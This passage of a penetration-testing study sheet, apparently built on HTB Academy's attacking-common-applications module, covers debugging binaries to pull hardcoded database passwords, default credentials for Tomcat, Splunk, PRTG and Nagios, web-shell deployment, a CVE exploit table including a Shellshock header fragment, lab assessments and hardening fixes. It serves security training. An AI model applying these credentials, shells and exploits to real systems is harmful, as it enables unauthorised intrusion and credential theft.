{'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart LR + A["Binary connects to a backend"] --> B{Type?} + B -->|ELF native| C["GDB + GEF/PEDA:\nbreakpoint the connect call"] + B -->|.NET assembly| D["dnSpy: decompile to C#"] + C --> E["Connection string sits\nin a register at the breakpoint"] + D --> E + E --> F["Reuse creds / password-spray"] +``` + +> [!info] Why not just `strings`? +> Connection strings are often assembled at runtime from reordered, endianness-reversed fragments, so a flat `strings` pass can miss the finished value. A breakpoint at the actual connect API captures the complete string. + +**ELF → MS SQL.** Run it to learn the driver API (`SQLDriverConnect`), disassemble, breakpoint the call, and read the register: + +```bash +gdb ./octopus_checker +gdb-peda$ set disassembly-flavor intel +gdb-peda$ disas main # find call to SQLDriverConnect@plt +gdb-peda$ b *0x5555555551b0 +gdb-peda$ run +# RDX: "DRIVER={ODBC Driver 17 for SQL Server};SERVER=localhost,1401;UID=username;PWD=password;" +``` + +**.NET DLL.** IL decompiles cleanly — triage the metadata, then read the controller in dnSpy: + +```powershell +Get-FileMetaData .\MultimasterAPI.dll # .NETFramework v4.6.1 · api/getColleagues +# dnSpy → MultimasterAPI.Controllers.ColleagueController → connection string inline +``` + +> [!tip] Maintained tooling +> **GEF** is the actively maintained GDB extension (successor to PEDA). **dnSpyEx** for .NET. For a fast first pass, `strings` + `binwalk`/`floss` (FLARE Obfuscated String Solver) sometimes recovers runtime-built strings without a debugger. + +--- + +## 17 · Other applications & hardening `fas:BookOpen` + +The specific apps above are practice material for one transferable method. Applied to anything unfamiliar: + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart TD + A["Unknown app found"] --> B{Default creds?} + B -->|Yes| C[Admin access] + B -->|No| D{Known CVE for this version?} + D -->|Yes| E[Public exploit / PoC] + D -->|No| F["Read the docs → find built-in\nfunctionality to abuse"] + C --> G["RCE via deploy/upload/script feature"] + E --> G + F --> G +``` + +### Honourable mentions + +| Application | Where to start | +|---|---| +| **Axis2** | Often on Tomcat. Weak/default admin creds → upload a web shell as an AAR (like a Tomcat WAR). Metasploit module exists. | +| **WebSphere** | Default `system:manager` → deploy a WAR for RCE. | +| **Elasticsearch** | Multiple serious CVEs; hunt forgotten/unauth instances (HTB *Haystack*). | +| **Zabbix** | SQLi, auth bypass, stored XSS, LDAP password disclosure, RCE; the API itself is abusable (HTB *Zipper*). | +| **Nagios** | History of RCE/privesc/SQLi/XSS. Default `nagiosadmin:PASSW0RD`. | +| **WebLogic** | Java EE server, 190+ CVEs, many unauth deserialisation RCEs (2007–2021). | +| **Wikis/intranets** | MediaWiki, SharePoint, custom builds — known CVEs plus search features that surface credentials. | +| **DotNetNuke (DNN)** | .NET CMS — auth bypass, traversal, file-upload bypass, arbitrary download. SQL Console → `xp_cmdshell`. | +| **vCenter** | Weak creds + CVE-2021-22005 (unauth OVA-upload RCE). Often already SYSTEM or domain admin — a single point of full compromise. | + +### Hardening reference + +- **Authentication:** strong passwords, change/disable default admin accounts, MFA for admins. +- **Access controls:** keep admin/login pages internal unless there's a real need; deny uploads/deploys where not required. +- **Disable unsafe features:** in-browser PHP editing (WordPress Theme Editor, Drupal PHP Filter) is a built-in RCE primitive even after a credential compromise. +- **Patch promptly:** nearly every exploit here is version-gated and long fixed upstream. +- **Inventory everything:** including shadow IT and forgotten trials — an org can't protect what it doesn't know exists (the Splunk trial is the poster child). + +| App | Fix | +|---|---| +| WordPress | Security plugin (WordFence) for monitoring, blocking, MFA | +| Joomla | Gate the admin login behind a secret key (AdminExile) | +| Drupal | Disable/hide/move the admin login | +| Tomcat | Restrict Manager/Host-Manager to localhost or IP-whitelist + strong non-standard creds | +| Jenkins | Fine-grained perms via the Matrix Authorization Strategy plugin | +| Splunk | Change defaults; license properly so auth can't silently lapse | +| PRTG | Patch; change the default `prtgadmin` password | +| osTicket | Limit internet exposure | +| GitLab | Restrict sign-up (admin approval, allowed email domains) | + +--- + +## 18 · Skills assessments `fas:Terminal` + +Three narrative labs against dynamically spawned INLANEFREIGHT targets. There are no fixed flags to reproduce — the value is running the whole method end to end and recording exact commands, output, and derived creds against your own instance. + +> [!example]+ Assessment I — foothold on the one soft host +> A well-hardened network with one interesting host. Enumerate → fingerprint every web app → default creds + version CVEs → abuse built-in functionality → `flag.txt`. +> ```bash +> sudo nmap -sV -sC -p- --open <target> +> ``` + +> [!example]+ Assessment II — the "boring" host hiding GitLab +> Re-enumerate a host that first seemed dull; a note points at `gitlab.inlanefreight.local`. Apply the [GitLab method](#10--gitlab-fasterminal--lab-port-8081) in full: `/etc/hosts` → `/explore` → self-registration → username enum → confirm version against the ExifTool RCE class. + +> [!example]+ Assessment III — hardcoded MSSQL password +> A Windows host with valid Administrator creds; find the MSSQL service password. Straight application of §16: +> ```bash +> evil-winrm -i <target> -u Administrator -p '<password>' +> # locate the MSSQL-connecting binary → GDB/x64dbg breakpoint (native) or dnSpy (.NET) +> ``` + +`evil-winrm` is still the standard for interactive WinRM. Across all three, an `httpx`/`nuclei` sweep speeds the initial fingerprint before the manual, app-specific work. + +--- + +## Quick reference `fas:ClipboardList` + +**Default credentials:** Tomcat `tomcat:tomcat` / `tomcat:s3cret` · Splunk `admin:changeme` · PRTG `prtgadmin:prtgadmin` · Nagios `nagiosadmin:PASSW0RD` · WebSphere `system:manager`. + +**Key ports:** Tomcat 8080/8180 · AJP 8009 · Jenkins 8080 (agent 5000) · Splunk 8000/8089 · PRTG 8080 · ColdFusion 8500 · GitLab (lab) 8081 · LDAP 389/636 · MSSQL 1433. + +| CVE | Target | Class | Delivery | +|---|---|---|---| +| CVE-2020-24186 | WordPress wpDiscuz | unauth upload RCE | `wp_discuz.py` | +| CVE-2019-10945 | Joomla core 1.5.0–3.9.4 | auth traversal + file delete | `joomla_dir_trav.py` | +| CVE-2014-3704 | Drupal 7.0–7.31 | pre-auth SQLi → rogue admin | `drupal_drupageddon` | +| CVE-2018-7600 | Drupal <7.58/<8.5.1 | pre-auth RCE (Drupalgeddon2) | `drupalgeddon2.py` | +| CVE-2018-7602 | Drupal | auth RCE (Drupalgeddon3) | `drupal_drupageddon3` | +| CVE-2020-1938 | Tomcat <9.0.31/8.5.51/7.0.100 | unauth AJP file read (Ghostcat) | `tomcat-ajp.lfi.py` | +| CVE-2019-0232 | Tomcat (Windows CGI) | command injection | `ffuf` + URL-encoded query | +| CVE-2018-9276 | PRTG <18.2.39 | auth command injection | notification "Execute Program" | +| CVE-2021-22205 | GitLab | unauth ExifTool RCE | (successor to ≤13.10.2 auth RCE) | +| CVE-2014-6271 | Bash/CGI | Shellshock | `curl -H 'User-Agent: () { :; };…'` | +| CVE-2010-2861 | ColdFusion ≤9.0.1 | traversal → cred leak | `14641.py` | +| CVE-2009-2265 | ColdFusion ≤8.0.1 | unauth FCKeditor RCE | `50057.py` | +| CVE-2021-22005 | vCenter | unauth OVA-upload RCE | — | + +## Lessons learned `fas:Lightbulb` + +1. **Version is the whole game.** Every CVE here is gated on an exact version — pull it from the generator meta, `CHANGELOG.txt`, `joomla.xml`, `/docs`, or a favicon hash *before* you pick an exploit. +2. **Admin console ≈ RCE.** Theme/template editors, the Jenkins Script Console, Tomcat Manager, Splunk apps, PRTG notifications — default creds plus a short spray reach them more often than a CVE does. +3. **Upload = a live backdoor.** WAR/plugin/app uploads leave a shell on disk. Record the path and remove it at cleanup; match shell language to server (VBScript→`.asp`, C#→`.aspx`, JSP→WAR). +4. **Apps carry other systems' creds.** Config files, connection strings, and osTicket/GitLab secrets feed straight into [service attacks](/sheets/pentest-workflow/attacking-common-services) and lateral movement — test every recovered credential for reuse. +5. **Scanners and eyes are complementary.** WPScan missed plugins that `curl | grep` caught; run both. +6. **`dev`/`qa`/`acc` first.** Non-prod copies are patched last and gated loosest. + +## References `fas:BookOpen` + +1. [HTB Academy — Attacking Common Applications](https://academy.hackthebox.com/module/details/113) +2. [WPScan](https://wpscan.com/) · [droopescan](https://github.com/SamJoan/droopescan) +3. [CVE-2020-24186 — wpDiscuz RCE](https://www.exploit-db.com/exploits/48706) · [CVE-2019-10945 — Joomla traversal](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945) +4. Drupalgeddon: [CVE-2014-3704](https://nvd.nist.gov/vuln/detail/CVE-2014-3704) · [CVE-2018-7600](https://nvd.nist.gov/vuln/detail/CVE-2018-7600) · [CVE-2018-7602](https://nvd.nist.gov/vuln/detail/CVE-2018-7602) +5. Tomcat: [Ghostcat CVE-2020-1938](https://nvd.nist.gov/vuln/detail/CVE-2020-1938) · [CVE-2019-0232](https://nvd.nist.gov/vuln/detail/CVE-2019-0232) · [tennc/webshell](https://github.com/tennc/webshell) +6. [Jenkins security advisories](https://www.jenkins.io/security/advisories/) · [Splunk custom apps](https://dev.splunk.com/enterprise/) +7. [CVE-2018-9276 — PRTG](https://nvd.nist.gov/vuln/detail/CVE-2018-9276) · [HTB Netmon](https://app.hackthebox.com/machines/Netmon) +8. [CVE-2021-22205 — GitLab ExifTool RCE](https://nvd.nist.gov/vuln/detail/CVE-2021-22205) · [Exploit-DB 49951 — GitLab 13.10.2 auth RCE](https://www.exploit-db.com/exploits/49951) +9. [CVE-2014-6271 — Shellshock](https://nvd.nist.gov/vuln/detail/CVE-2014-6271) +10. ColdFusion: [CVE-2010-2861](https://nvd.nist.gov/vuln/detail/CVE-2010-2861) · [CVE-2009-2265](https://nvd.nist.gov/vuln/detail/CVE-2009-2265) +11. [irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) +12. [OWASP — LDAP Injection](https://owasp.org/www-community/attacks/LDAP_Injection) · [OWASP — Mass Assignment](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html) +13. Reversing: [Ghidra](https://ghidra-sre.org/) · [dnSpyEx](https://github.com/dnSpyEx/dnSpy) · [GEF](https://github.com/hugsy/gef) · [FLOSS](https://github.com/mandiant/flare-floss) + +## Image credits `fas:BookOpen` + +Logos are re-hosted from Wikimedia Commons for identification only and remain the trademarks of their respective owners. The table below carries the author and licence for each — this satisfies the attribution/notice terms of the CC BY-SA, GPL, and MIT marks; public-domain and CC0 marks are listed for completeness. + +| Image | Author / owner | Licence | Source | +|---|---|---|---| +| WordPress | WordPress Foundation | Public domain (PD-textlogo) | [Commons](https://commons.wikimedia.org/wiki/File:WordPress_logo.svg) | +| Joomla | Open Source Matters | Public domain | [Commons](https://commons.wikimedia.org/wiki/File:Joomla!-Logo.svg) | +| Drupal (Druplicon) | Drupal project | GPL-2.0 | [Commons](https://commons.wikimedia.org/wiki/File:Druplicon.vector.svg) | +| Apache Tomcat | Apache Software Foundation | Public domain | [Commons](https://commons.wikimedia.org/wiki/File:Apache_Tomcat_logo.svg) | +| Jenkins | The Jenkins project | CC BY-SA 3.0 | [Commons](https://commons.wikimedia.org/wiki/File:Jenkins_logo_with_title.svg) | +| Splunk | Splunk Inc. | Public domain | [Commons](https://commons.wikimedia.org/wiki/File:Splunk_logo.svg) | +| PRTG | Paessler AG | CC BY-SA 4.0 | [Commons](https://commons.wikimedia.org/wiki/File:PRTG_Logo.svg) | +| osTicket | Rajsinghnovanet (Commons) | CC BY-SA 4.0 | [Commons](https://commons.wikimedia.org/wiki/File:Osticket_long_logo.png) | +| GitLab | GitLab B.V. | MIT | [Commons](https://commons.wikimedia.org/wiki/File:GitLab_logo.svg) | +| Adobe ColdFusion | Adobe Inc. | Public domain (PD-textlogo) | [Commons](https://commons.wikimedia.org/wiki/File:Adobe_ColdFusion_logo_2021.svg) | +| Microsoft IIS | Tanya Pradhan (Commons) | CC BY-SA 4.0 | [Commons](https://commons.wikimedia.org/wiki/File:Iis-logo.png) | +| Shellshock bug | Wikimedia Commons | CC0 (public domain) | [Commons](https://commons.wikimedia.org/wiki/File:Shellshock-bug.svg) | + +--- + +[← Condensed cheat sheet](/sheets/pentest-workflow/attacking-common-applications) · [Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Web enum deep-dive →](/sheets/pentest-workflow/web-enumeration-and-exploitation)